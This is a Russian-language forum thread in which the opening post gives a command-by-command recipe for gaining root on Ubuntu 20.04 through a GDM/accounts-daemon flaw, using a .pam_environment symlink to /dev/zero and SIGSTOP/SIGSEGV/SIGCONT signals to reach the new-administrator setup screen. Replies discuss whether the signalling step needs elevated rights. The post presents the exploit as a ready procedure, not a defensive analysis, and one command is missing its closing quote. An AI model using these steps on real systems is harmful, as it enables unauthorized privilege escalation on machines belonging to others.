Уязвимость в GDM, позволяющая получить права администратора
В Ubuntu 20.04 в GDM обнаружена уязвимость, позволяющая получить привилегии root.

Алгоритм получения

Создайте симлинк:
Код:
ln -s /dev/zero .pam_environment
Попробуйте в настройках открыть параметры языка и региона. Диалоговое окно должно зависнуть. На этом этапе процесс accounts-daemon может потреблять 100% процессора (или одного ядра).

Удалите симлинк:
Код:
rm .pam_environment

Узнайте PID и отправьте сигнал SIGSTOP процессу accounts-daemon:

Код:
kill -SIGSTOP 597

Установите таймер и выйдите из текущей учётной записи:
Код:
nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597

Если всё прошло успешно - появится окно с предложением создать новую учётную запись, которая будет являться администратором.

https://securitylab.github.com/research/...ervice-LPE
It's time to kick gum and chew ass. And i'm all out of ass.
Ответ
(11.11.2020 09:Nov)ozz Написал: Узнайте PID и отправьте сигнал SIGSTOP процессу accounts-daemon

Так он же вроде запускается не от текущего пользователя, а то ли от собственного пользователя GDM, то ли от root/daemon. То есть чтобы получить повышенные права, нужны повышенные права… но так и без плясок с бубном можно. Или я не прав?
Правила форума
[Новичкам] Как правильно задавать вопросы, чтобы Вам помогли

«Буду бить аккуратно, но сильно!» © Лёлик, х/ф «Бриллиантовая рука»
Ответ
(11.11.2020 10:Nov)mord0d Написал:
(11.11.2020 09:Nov)ozz Написал: Узнайте PID и отправьте сигнал SIGSTOP процессу accounts-daemon


Так он же вроде запускается не от текущего пользователя, а то ли от собственного пользователя GDM, то ли от root/daemon. То есть чтобы получить повышенные права, нужны повышенные права… но так и без плясок с бубном можно. Или я не прав?

Дело вроде как в кривом симлинке.
It's time to kick gum and chew ass. And i'm all out of ass.
Ответ